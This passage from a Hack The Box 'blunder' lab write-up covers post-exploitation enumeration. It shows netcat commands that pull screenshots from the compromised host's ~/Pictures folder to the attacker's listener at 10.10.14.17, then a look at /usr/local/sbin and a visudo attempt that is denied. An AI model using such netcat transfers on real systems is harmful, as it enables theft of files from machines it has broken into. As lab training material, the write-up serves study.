Screenshots
shaun@blunder:~$ ll Pictures
total 624K
4.0K drwxr-xr-x 2 shaun shaun 4.0K Nov 28 2019 .
4.0K drwxr-xr-x 16 shaun shaun 4.0K Jul 6 2021 ..
172K -rw-r--r-- 1 shaun shaun 171K Nov 28 2019 'Screenshot from 2019-11-28 14-02-13.png'
444K -rw-r--r-- 1 shaun shaun 441K Nov 28 2019 'Screenshot from 2019-11-28 13-17-29.png'Upon gaining a lateral moment to the shaun user, I came across 2 screenshots in the ~/Pictures directory
shaun@blunder:~/Pictures$ nc 10.10.14.17 2222 < 'Screenshot from 2019-11-28 13-17-29.png'
shaun@blunder:~/Pictures$ nc 10.10.14.17 2222 < 'Screenshot from 2019-11-28 14-02-13.png'
┌──(kali㉿kali)-[~/…/htb/labs/blunder/screenshots]
└─$ nnc 2222 > 'Screenshot from 2019-11-28 13-17-29.png'
listening on [any] 2222 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.191] 56024
┌──(kali㉿kali)-[~/…/htb/labs/blunder/screenshots]
└─$ nnc 2222 > 'Screenshot from 2019-11-28 14-02-13.png'
listening on [any] 2222 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.191] 56028Transfer complete
Screenshot from 2019-11-28 13-17-29.png
┌──(kali㉿kali)-[~/…/htb/labs/blunder/screenshots]
└─$ open Screenshot\ from\ 2019-11-28\ 13-17-29.png
This screenshot appears to demonstrate an exploit PoC located at the /usr/local/sbin directory as the hugo user
hugo@blunder:~$ ll ll /usr/local/sbin
total 792K
4.0K drwxr-xr-x 2 root root 4.0K Apr 28 2020 .
784K -rwxr-xr-x 1 root root 782K Apr 27 2020 visudo
4.0K drwxr-xr-x 11 root root 4.0K Apr 27 2020 ..The only thing present in the /usr/local/sbin directory is visudo
hugo@blunder:~$ /usr/local/sbin/visudo
visudo: /etc/sudoers: Permission deniedPermission denied
Screenshot from 2019-11-28 14-02-13.png
┌──(kali㉿kali)-[~/…/htb/labs/blunder/screenshots]
└─$ Screenshot\ from\ 2019-11-28\ 14-02-13.png